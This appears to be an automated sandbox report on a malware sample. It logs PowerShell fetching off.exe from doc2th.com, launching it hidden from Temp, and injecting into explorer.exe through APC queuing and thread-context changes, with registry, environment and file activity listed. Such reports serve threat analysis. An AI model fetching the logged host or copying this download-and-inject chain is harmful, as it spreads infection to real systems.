Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	-	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	"C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"	os_pid = 0xb84, show_window = SW_HIDE		1	Fn

Module (5)

Operation	Module	Additional Information	Count	Logfile
Get Filename	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
Get Filename	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	2	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Map	-	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn

System (9)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = F71GWAT	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (33)

Operation	Additional Information	Count	Logfile
Create	mutex_name = Global\.net clr networking	10	Fn
Create	mutex_name = Global\.net clr networking	1	Fn
Create	mutex_name = Global\.net clr networking	5	Fn
Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Release	mutex_name = Global\.net clr networking	1	Fn
Release	mutex_name = Global\.net clr networking	10	Fn
Release	mutex_name = Global\.net clr networking	5	Fn

Environment (119)

Operation	Additional Information	Count	Logfile
Get Environment String	name = MshEnableTrace	111	Fn
Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Get Environment String	name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR	1	Fn
Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Get Environment String	name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Set Environment String	name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn

Network Behavior

DNS (1)

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = doc2th.com, address_out = 192.232.251.15		1	Fn

HTTP Sessions (1)

Information	Value
Total Data Sent	0.07 KB (71 bytes)
Total Data Received	232.23 KB (237802 bytes)
Contacted Host Count	1
Contacted Hosts	doc2th.com

HTTP Session #1

Information	Value
Server Name	doc2th.com
Server Port	80
Data Sent	0.07 KB (71 bytes)
Data Received	232.23 KB (237802 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = doc2th.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /tin/off.exe	1	Fn
Send HTTP Request	headers = host: doc2th.com, connection: Keep-Alive, url = doc2th.com/tin/off.exe	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 65536, size_out = 8972	1	Fn Data
Read Response	size = 65536, size_out = 3752	1	Fn Data
Read Response	size = 65536, size_out = 3508	1	Fn Data
Read Response	size = 65536, size_out = 23232	1	Fn Data
Read Response	size = 65536, size_out = 7260	1	Fn Data
Read Response	size = 65536, size_out = 1452	2	Fn Data
Read Response	size = 65536, size_out = 2904	1	Fn Data
Read Response	size = 65536, size_out = 1452	1	Fn Data
Read Response	size = 65536, size_out = 4356	1	Fn Data
Read Response	size = 65536, size_out = 1452	1	Fn Data
Read Response	size = 65536, size_out = 20328	1	Fn Data
Read Response	size = 65536, size_out = 5808	1	Fn Data
Read Response	size = 65536, size_out = 1452	1	Fn Data
Read Response	size = 65536, size_out = 4356	1	Fn Data
Read Response	size = 65536, size_out = 17424	1	Fn Data
Read Response	size = 65536, size_out = 4356	1	Fn Data
Read Response	size = 65536, size_out = 30492	1	Fn Data
Read Response	size = 65536, size_out = 4356	1	Fn Data
Read Response	size = 65536, size_out = 30492	1	Fn Data
Read Response	size = 54850, size_out = 15972	1	Fn Data
Read Response	size = 38878, size_out = 2904	1	Fn Data
Read Response	size = 35974, size_out = 24684	1	Fn Data
Read Response	size = 11290, size_out = 11290	1	Fn Data
Close Session	-	1	Fn

Process #6: lambdoidtegument.exe

(Host: 5563, Network: 0)

Information	Value
ID	#6
File Name	c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe
Command Line	"C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:57, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:22

OS Process Information

Information	Value
PID	0xb84
Parent PID	0xb44 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B88 0x BCC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00140000	0x001a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001c0000	0x001c0000	0x002bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000002c0000	0x002c0000	0x00387fff	Pagefile Backed Memory	Readable	Region Actions
rpcss.dll	0x00390000	0x003ebfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rsaenh.dll	0x003a0000	0x003dbfff	Memory Mapped File	Readable	Region Actions
private_0x00000000003a0000	0x003a0000	0x003a7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003b0000	0x003b0000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003b0000	0x003b0000	0x003d9fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003e0000	0x003e0000	0x003ecfff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
lambdoidtegument.exe	0x00400000	0x0043afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000400000	0x00400000	0x00429fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000440000	0x00440000	0x00540fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000550000	0x00550000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000550000	0x00550000	0x00579fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000590000	0x00590000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000005f0000	0x005f0000	0x005fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000600000	0x00600000	0x011fffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001200000	0x01200000	0x0130ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001200000	0x01200000	0x012defff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001300000	0x01300000	0x0130ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001310000	0x01310000	0x0170ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01710000	0x019defff	Memory Mapped File	Readable	Region Actions
private_0x00000000019e0000	0x019e0000	0x01b9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000019e0000	0x019e0000	0x01afffff	Private Memory	Readable, Writable	Region Actions Download Dump
~dff8ff715eb6fd8eb1.tmp	0x019e0000	0x01a5ffff	Memory Mapped File	Readable, Writable	Region Actions Download Dump
private_0x0000000001ac0000	0x01ac0000	0x01afffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001b60000	0x01b60000	0x01b9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ba0000	0x01ba0000	0x01cbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ba0000	0x01ba0000	0x01c1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001cb0000	0x01cb0000	0x01cbffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001cc0000	0x01cc0000	0x020bffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000020c0000	0x020c0000	0x021fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000020c0000	0x020c0000	0x021bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000021c0000	0x021c0000	0x021fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002200000	0x02200000	0x0a1fffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x000000000a200000	0x0a200000	0x0a35ffff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x000000000a340000	0x0a340000	0x0a47cfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000a480000	0x0a480000	0x0a6fafff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x73250000	0x73261fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x733b0000	0x733b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x733c0000	0x733dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x73bd0000	0x73be2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74910000	0x7494afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x75000000	0x7505efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75580000	0x7560efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x766f0000	0x7684bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77090000	0x77095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x770d0000	0x77104fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\bgc6u8~1\appdata\local\temp\~dff8ff715eb6fd8eb1.tmp	6.00 KB (6144 bytes)	MD5: 79f341fd3ffdd288d176c7ff38c456c3 SHA1: da6159d0bb110771e34af83252e0c0d5929d7e3a SHA256: 71ede8a3db6c3437883e1ce09890aa1789ee8a4777263b8f5cd0324d493ed884		File Actions Show Properties Download

Host Behavior

File (12)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Windows\SYSTEM32\ntdll.dll	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Windows\System32\cmmon32.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Windows\SYSTEM32\ntdll.dll	type = extended	2	Fn
Get Info	\??\C:\Windows\System32\cmmon32.exe	type = extended	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Read	\??\C:\Windows\SYSTEM32\ntdll.dll	offset = 0, size = 1288488	1	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-		2	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION		1	Fn
Open	c:\windows\system32\cmmon32.exe	desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION		1	Fn

Thread (7)

Operation	Process	Additional Information	Count	Logfile
Open	-	os_tid = 0x614	1	Fn
Open	c:\windows\system32\cmmon32.exe	os_tid = 0xbd8	1	Fn
Suspend	-	os_tid = 0x614	1	Fn
Get Context	-	os_tid = 0x614	1	Fn
Queue APC	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Set Context	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Resume	c:\windows\explorer.exe	os_tid = 0x614	1	Fn

Memory (1)

Operation	Process	Additional Information	Success	Count	Logfile
Read	c:\windows\explorer.exe	address = 0x6347a00, size = 680		1	Fn Data

Module (140)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x75580000	1	Fn
Load	SXS.DLL	base_address = 0x75000000	1	Fn
Load	NTDLL	base_address = 0x76f50000	1	Fn
Load	kernel32	base_address = 0x76c10000	14	Fn
Load	user32	base_address = 0x76620000	3	Fn
Load	ntdll	base_address = 0x76f50000	2	Fn
Load	advapi32	base_address = 0x754d0000	3	Fn
Load	IPHlpApi	base_address = 0x733c0000	1	Fn
Load	shell32	base_address = 0x75810000	1	Fn
Load	User32	base_address = 0x76620000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76c10000	2	Fn
Get Handle	c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x75580000	1	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x766f0000	1	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x76620000	1	Fn
Get Filename	-	process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c676b5	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x755e70a1	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = DispCallFunc, address_out = 0x75593dcf	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x755907b7	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x755b1ca9	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = CreateTypeLib2, address_out = 0x75598e70	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromUdate, address_out = 0x75597684	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarUdateFromDate, address_out = 0x7559cc98	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = GetAltMonthNames, address_out = 0x755c903a	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x75596231	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x75595fea	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecFromR4, address_out = 0x755a3f94	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecFromR8, address_out = 0x755a4e9e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecFromDate, address_out = 0x755cdb72	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecFromI4, address_out = 0x755b2a8c	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecFromCy, address_out = 0x755cd737	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromDec, address_out = 0x755ce015	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x755ccc3d	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x755cd1c4	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x755cd48c	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x755cd4c6	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x755cd509	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArraySetIID, address_out = 0x7559e7bb	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x7559e496	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x7559ddf1	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x755cd53f	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFormat, address_out = 0x755d2055	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFormatDateTime, address_out = 0x755d20ea	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFormatNumber, address_out = 0x755d2151	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFormatPercent, address_out = 0x755d21f5	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFormatCurrency, address_out = 0x755d2288	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarWeekdayName, address_out = 0x755d2335	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMonthName, address_out = 0x755d23d5	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x755a5934	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x755a5a98	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCat, address_out = 0x755a59b4	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x755fe405	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarEqv, address_out = 0x755fef07	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x755ff00a	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarImp, address_out = 0x755fef47	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x755ff15e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x755fdbd4	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x755fecfa	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarPow, address_out = 0x755fea66	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x755fd332	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x755fee2e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAbs, address_out = 0x755fca11	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarFix, address_out = 0x755fcc5f	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarInt, address_out = 0x755fcde7	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x755fc802	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x755fec66	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarRound, address_out = 0x755fd155	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7559b0dc	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecAdd, address_out = 0x755b5f3e	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDecCmp, address_out = 0x755a4fd0	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrCat, address_out = 0x755a0d2c	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyMulI4, address_out = 0x755b59ed	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrCmp, address_out = 0x7558f8b8	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76739d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x76700782	1	Fn
Get Address	c:\windows\system32\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75047685	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x766367cf	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromWindow, address_out = 0x76633622	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromRect, address_out = 0x76630ca1	1	Fn
